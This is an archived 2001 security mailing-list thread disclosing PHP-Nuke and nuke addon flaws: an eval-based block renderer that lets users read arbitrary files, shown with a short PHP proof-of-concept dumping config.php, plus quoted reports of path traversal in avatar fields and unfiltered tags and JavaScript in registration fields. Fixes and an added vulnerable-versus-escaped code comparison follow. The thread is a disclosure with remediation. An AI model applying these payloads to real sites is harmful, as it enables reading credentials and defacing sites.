I don't find it a serious bug... they can just ruin their details page... so who cares... However, if you want a serious bug of PHP-Nuke... well, there is one that allows reading any file on the system. Look at:
http://www.twlc.net/article.php?sid=318

Mauro
admin of twlc dot net

bug in nuke addon@#! DANGEROUS++!!!
Posted on Friday, July 13 @ 19:53:31 CDT
topic: advisories

Evening everyone.. Sorry to tell you: php nuke addon is BUGGY. It got a *HUGE* bug that allows reading of every file on the system. Let me explain you the bug...

To do active forums and shit like that the author had to put:

    echo "<tr valign=\"top\"><td bgcolor=\"#ffffff\">";
    if (file_exists($content)) {
        $fp = fopen($content, "r");
        $content = fread($fp, filesize($content));
        fclose($fp);
        $content = "?>$content<?";
        echo eval($content);
    } else {
        echo $content;
    }
    echo "</td></tr></table>";

replacing

    ."<tr valign=\"top\"><td bgcolor=\"#ffffff\">"
    ."$content"
    ."</td></tr></table>"

ON EACH THEME file... So what does this code do? It checks the content of the block and if this is a file it 'executes' it... Now I was like 'and if I put something like this'

    <?php
    $db = "config.php";
    $fdb = @file($db);
    $ldb = count($fdb) - 1;
    while ($ldb >= 0) {
        echo $fdb[$ldb];
        $ldb--;
    }
    ?>

(sorry for the code, but I am not a php guru :P) and name it exploit.php and put it in the main directory? It simply allowed me to read config.php. But a friend of mine (shockzor THANK YOU BRO) told me "who could put a file like that on your webserver" (I didn't make the test to upload it on my anonymous ftp but I think it could work :)) but that's just a possibility that this routine gives to you, 'cause I went ahead doing these tests and I found that this SIMPLY ALLOWS ANY FILE READING ON THE SYSTEM. LOOK:

(sg|code) u got autoexec.bat under c: ?
(shockzor) no
(shockzor) autoexec.nt
(sg|code) good
(sg|code) Menu for shit <sg|code>
(sg|code) lh %SystemRoot%\system32\mscdexnt.exe
          lh %SystemRoot%\system32\redir
          lh %SystemRoot%\system32\dosx
(sg|code) now
(sg|code) since i am
(sg|code) 31337
(sg|code) WHAT?
(sg|code) EHEH
(shockzor) i dont think you can get out of the www root
(sg|code) u think wrong
(sg|code) cus i just did

Well, you got two fixes:

1) bring back your themes file to:

    ."<tr valign=\"top\"><td bgcolor=\"#ffffff\">"
    ."$content"
    ."</td></tr></table>"

2) get user.php, go at the end of the file where there is:

    switch($op) {

look down until you find

    case "edithome":
        edithome();
        break;

    case "savehome":
        savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock);
        break;

Remove this shit so users can't create their "home menu".

Thanks for the attention. BTW I would like to thank shockzor that helped me making the tests! Thanks bro..! :D Thanks also goes out to all in #twlc on undernet. Peace out. (Thanks goes out also to the authors of PHP-Nuke and php nuke addon, I run 'em and I like 'em a lot! Keep up the good work)

Mauro aka supergate
rootat_private
http://www.twlc.net

The following text has been posted to
http://www.twlc.net
http://www.phpnuke.org
http://www.nukeaddon.com

----- Original Message -----
From: "MegaHz" <costconat_private>
To: <VULN-DEVat_private>; <INCIDENTSat_private>; <bugtraqat_private>
Cc: <mc2at_private>
Sent: Friday, July 27, 2001 4:41 PM
Subject: SERIOUS BUG IN PHPNUKE

> Yes, phpnuke.org, was contacted....
>
> First take a look at:
> http://phpnuke.org/user.php?op=userinfo&uname=MegaHz
>
> Then, read this.................
> PHPnuke Bugs.
>
> After testing just a few scripts on phpnuke I have noticed the following:
>
> Some fields in the registration form allow code
> and fail to filter out the tags.
> e.g. Interests: src=http://www.anything.com/defaced.gif>
>
> Also when faking a form and posting from local file (user.php.html)
> after editing a few fields like the avatar picture for example,
> it is possible to escape certain dirs with the ../../../../dir/pic.gif
> in the options field.
>
> (-- This is a local html file and set to post to user.php on the target
> server --)
> (no this is not a tag :P )
>
> 001.gif
> 002.gif
>
> This tells user.php to save the avatar path as
> http://www.target.com/../../../dir_on_server/anyfile.ext and loads the file
> when the user info of the attacker is viewed.
>
> As we know webbugs (invisible or visible pics can be used for tracing)
>
> The preview of the Registration Form allows Javascript in the
> body (not the user.php) but it does not allow ' or ". BUT you can use /
> instead of '
> so this helps to fill in variables in javascript.
>
> This can damage the site and make it look ugly.
>
> I couldn't be bothered to look at the rest of phpnuke...
>
> Tested on phpnuke v5.0
>
> Firstly discovered by: dinopio
>
> =================================================
> Andreas Constantinides (MegaHz)
> Owner - Admin of cHp - http://www.cyhackportal.com
> megahzat_private
> ICQ#: 30136845
> =================================================
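The block-rendering flaw Mauro describes, reduced to a vulnerable function next to a hardened one that treats the block as plain text (what fix 1 above restores). This is added example code, not PHP-Nuke's or nuke addon's own; the function names and the use of "config.php" as a sample block value are illustrative only.

```php
<?php
// Added example (not PHP-Nuke or nuke addon code). Reproduces the
// block-rendering logic from the advisory in simplified form so the
// two behaviours can be compared side by side.

// Vulnerable pattern: if the block text happens to be a path to an
// existing file, that file is read and handed to eval(), so whoever
// controls $content (e.g. via the "home menu" block) can read or run
// any file the web server account can open.
function render_block_vulnerable(string $content): string
{
    $out = "<tr valign=\"top\"><td bgcolor=\"#ffffff\">";
    if (file_exists($content)) {
        $fp = fopen($content, "r");
        $data = fread($fp, filesize($content));
        fclose($fp);
        ob_start();
        eval("?>" . $data);      // file content is treated as code
        $out .= ob_get_clean();
    } else {
        $out .= $content;        // raw output, no escaping either
    }
    return $out . "</td></tr></table>";
}

// Hardened pattern: the block is data, never a path and never code.
// It is also HTML-escaped, which covers the other issue in this
// thread (tags surviving in user-supplied profile fields).
function render_block_safe(string $content): string
{
    return "<tr valign=\"top\"><td bgcolor=\"#ffffff\">"
         . htmlspecialchars($content, ENT_QUOTES, 'UTF-8')
         . "</td></tr></table>";
}

// Constructed demonstration: a block whose text is just a file name.
$block = "config.php";
echo render_block_safe($block), "\n";
// The safe version prints the literal string "config.php"; the
// vulnerable version would instead open and eval() that file if it
// exists relative to the script's working directory.
```

Running the script with only the safe renderer, as above, is enough to see the difference: the file name reaches the browser as text, and no file on disk is touched.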
This archive was generated by hypermail 2b30 : Fri Jul 27 2001 - 14:40:29 PDT